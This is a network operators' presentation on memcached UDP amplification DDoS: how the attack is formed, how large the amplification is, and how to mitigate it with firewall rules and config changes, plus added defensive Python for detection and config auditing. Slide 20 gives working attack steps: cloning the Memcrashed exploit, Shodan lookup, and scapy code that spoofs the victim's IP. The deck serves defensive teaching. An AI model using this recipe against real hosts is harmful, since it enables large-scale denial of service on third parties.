Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation)
by Muhammad Morshed Alam, AmberIT Limited, morshed@amberit.com.bd
1. Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation)
Presenter
Muhammad Morshed Alam
AmberIT Limited
morshed@amberit.com.bd
<Arbor Networks> <Shodan Stats>
2. Outlines
• Memcache overview
• Memcache variables and commands
• Memcache DDoS amplification attack formulation, amplification factor
• Memcache DDoS tools (set and get requests, spoofed UDP packets)
• Mitigation (securing memcache servers using a firewall and SASL authentication)
3. Memcached Overview
• Free & open source, high-performance, distributed memory object caching system
• Uses key-value pairs to store arbitrary data (strings, objects)
• Set(key, data) <= save the data under the key
  Get(key) => return the data stored under the key
• add, delete and replace commands insert, remove or overwrite the data of a key (add only succeeds if the key is absent, replace only if it already exists)
• Optimizes backend database performance by temporarily storing information in cache memory
6. Install Memcache Service (contd.)
Verify the listening ports with the ss or netstat command:
# ss -tulpn | grep :11211
# netstat -tulpn | grep :11211
Configuration file:
# sudo vi /etc/memcached.conf
Service restart process:
# sudo systemctl restart memcached
7. Memcache Variables and Commands:
Connecting to the Memcache service:
root@bdnog-memcace:~# telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 12476
STAT uptime 20
STAT time 1524726956
STAT version 1.4.25 Ubuntu
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 0.008000
STAT rusage_system 0.004000
STAT curr_connections 1
STAT total_connections 2
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 0
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 7
STAT bytes_written 0
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END
8. Memcache-tools and outputs
# Setting data for a key:
set key 0 3600 16
Welcome to BDNog
STORED
# Getting the value of a key:
get key
VALUE key 0 16
Welcome to BDNog
END
Using the libmemcached-tools commands:
root@bdnog-memcace:~# memcstat --servers 127.0.0.1
Output: the current values of all memcache stats variables, e.g.,
STAT cmd_get 1
STAT cmd_set 1
root@bdnog-memcace:~# memcdump --servers 127.0.0.1
Output: all keys currently holding cached data, i.e.,
key
root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
Output: the value stored under that key, i.e.,
Welcome to BDNog
set <keyname> <some_flag> <expiration_in_seconds> <length_of_data_to_follow>
9. Vulnerable Memcached Server
• No authentication required to access
• Unauthenticated clients can inject large payloads into the cache
• Listens on connectionless UDP port 11211 for requests from any IP address
• UDP allows unreliable data delivery; target hosts receive data without prior consent
(Figure: statistics of vulnerable memcached services exposed on the internet, from Qrator Labs and Akamai)
10. Attack Formulation
1. Find a vulnerable memcached server listening on UDP port 11211 with a high value of the limit_maxbytes variable
2. Run a memcache SET command and fill one key to its maximum size with data to ensure a large payload
3. Send multiple forged GET requests for that key in a continuous UDP stream, spoofing the victim IP as the source
Attacker's UDP packets contain:
• UDP GET key requests
• Size: 15 B, SRC IP: spoofed target IP, DST port: 11211, DST IP: memcache host
Vulnerable memcached servers exposed on the Internet and listening on UDP port 11211
<Victims/Targets>
GET responses reflected to the victim IP carrying (key, value)
The value of DATA is large, i.e., total size = (key, value) * number of requests
GET request 15 B => 750 kB response, 50000x amplification (Akamai report)
SRC IP: memcache host, DST IP: target, SRC port: 11211
11. Memcache Amplification DDoS on Bandwidth Consumption
1. An attacker may use multiple vulnerable memcached servers against a specific target IP by spoofing the SRC IP
2. The target's network infrastructure is overwhelmed with UDP traffic
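As an added example (not part of the deck), the following Python computes the bandwidth amplification factor from the request and response sizes quoted above, and applies a simple reflection-detection rule to constructed flow records: UDP traffic sourced from port 11211 by many distinct hosts converging on one destination. The sample addresses and the thresholds are assumptions.

```python
from collections import defaultdict

MEMCACHED_PORT = 11211

# Constructed sample flow records, not real captures:
# (src_ip, src_port, dst_ip, dst_port, proto, bytes)
SAMPLE_FLOWS = [
    ("198.51.100.10", 11211, "203.0.113.5", 40000, "udp", 750_000),
    ("198.51.100.11", 11211, "203.0.113.5", 40000, "udp", 750_000),
    ("198.51.100.12", 11211, "203.0.113.5", 40000, "udp", 750_000),
    ("198.51.100.13", 11211, "203.0.113.5", 40000, "udp", 750_000),
    ("192.0.2.7", 11211, "192.0.2.9", 53122, "tcp", 1_200),   # normal TCP cache client
    ("192.0.2.8", 443, "203.0.113.5", 51000, "tcp", 9_000),    # unrelated HTTPS traffic
]


def amplification_factor(request_bytes, response_bytes):
    """Bandwidth amplification factor: bytes reflected per byte the attacker sends."""
    return response_bytes / request_bytes


def memcached_reflection_victims(flows, min_reflectors=3, min_bytes=1_000_000):
    """Return {dst_ip: (distinct_reflectors, total_bytes)} for destinations receiving
    UDP traffic with source port 11211 from at least min_reflectors distinct hosts
    and at least min_bytes in total. Legitimate cache clients use TCP from a trusted
    network, so high-volume UDP from port 11211 on many hosts indicates reflection."""
    per_dst = defaultdict(lambda: [set(), 0])
    for src, sport, dst, _dport, proto, nbytes in flows:
        if proto == "udp" and sport == MEMCACHED_PORT:
            per_dst[dst][0].add(src)
            per_dst[dst][1] += nbytes
    return {dst: (len(srcs), total) for dst, (srcs, total) in per_dst.items()
            if len(srcs) >= min_reflectors and total >= min_bytes}


if __name__ == "__main__":
    print("amplification factor:", amplification_factor(15, 750_000))
    print("victims:", memcached_reflection_victims(SAMPLE_FLOWS))
```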
12. Trends of Protocols Used for Reflection
(Figure: memcache accounts for the largest share of counted reflection DDoS attacks; DDoSMon stats)
20. Memcached DDoS Tools
Sends forged UDP packets (SRC IP spoofed to the target IP) to vulnerable Memcached servers obtained using the Shodan API
# git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
# apt-get install python3
# pip install shodan    # Shodan search engine client
# pip install scapy     # required to craft UDP packets
Pass the API key collected from https://account.shodan.io/login and enter the target victim IP address to run the attack
# python3 Memcrashed.py
# "injected" is the key; an arbitrary value is inserted into the cache
setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n")
getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
# using scapy to set the SRC IP and send the get request on behalf of the victim/target IP
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)), dport=11211) / Raw(load=setdata))
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)), dport=11211) / Raw(load=getdata))
23. Step-1: Configuring the Firewall
For TCP:
# /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
For UDP:
# /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Or disable access permanently (e.g., on Zimbra Collaboration hosts):
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Note: save the iptables rules and verify them:
# iptables -L -v -n
Secure memcached server to avoid DDoS amplification attacks
24. Step-2: Changing the Configuration:
# sudo vim /etc/memcached.conf
# listen only on localhost and the trusted block
-l 127.0.0.1,172.16.3.1
# disable UDP listening on port 11211
-U 0
# sudo systemctl restart memcached
Secure memcached server to avoid DDoS amplification attacks (contd.)
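An added example, not from the deck: a small auditor for /etc/memcached.conf that checks the two settings of Step-2 (-l restricted to localhost or trusted addresses, -U 0) and flags a missing -U, since older memcached versions enable UDP when it is absent. The sample config contents and the trusted prefixes (loopback plus the 172.16.x.x addresses used in the slides) are assumptions.

```python
# Constructed sample contents of /etc/memcached.conf (not copied from a real host).
WEAK_CONF = """\
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""

HARDENED_CONF = """\
-d
-m 64
-p 11211
-u memcache
# listen only on localhost and the trusted block
-l 127.0.0.1,172.16.3.1
# disable the UDP listener
-U 0
"""

# Assumed trusted address prefixes: loopback plus the 172.16.x.x addresses from the slides.
TRUSTED_PREFIXES = ("127.", "::1", "172.16.")


def parse_memcached_conf(text):
    """Return {flag: [values]} for option lines such as '-l 127.0.0.1' or '-U 0'."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("-"):
            continue  # blank lines, comments and non-flag settings such as 'logfile'
        parts = line.split(None, 1)
        opts.setdefault(parts[0], []).append(parts[1].strip() if len(parts) > 1 else "")
    return opts


def audit_memcached_conf(text, trusted_prefixes=TRUSTED_PREFIXES):
    """Return a list of findings; an empty list means both hardening steps are applied."""
    opts = parse_memcached_conf(text)
    findings = []
    udp = opts.get("-U")
    if udp is None:
        findings.append("-U not set: UDP is on by default before memcached 1.5.6; add '-U 0'")
    elif udp[-1] != "0":
        findings.append(f"UDP listener enabled on port {udp[-1]}; set '-U 0'")
    listen = [a.strip() for v in opts.get("-l", []) for a in v.split(",") if a.strip()]
    if not listen:
        findings.append("-l not set: memcached binds every interface; restrict with -l")
    for addr in listen:
        if addr in ("0.0.0.0", "::") or not addr.startswith(trusted_prefixes):
            findings.append(f"listen address {addr} is neither localhost nor a trusted block")
    return findings
```

Run it against the real file with `audit_memcached_conf(open("/etc/memcached.conf").read())`; the firewall rules of Step-1 still matter because this only covers the daemon's own configuration.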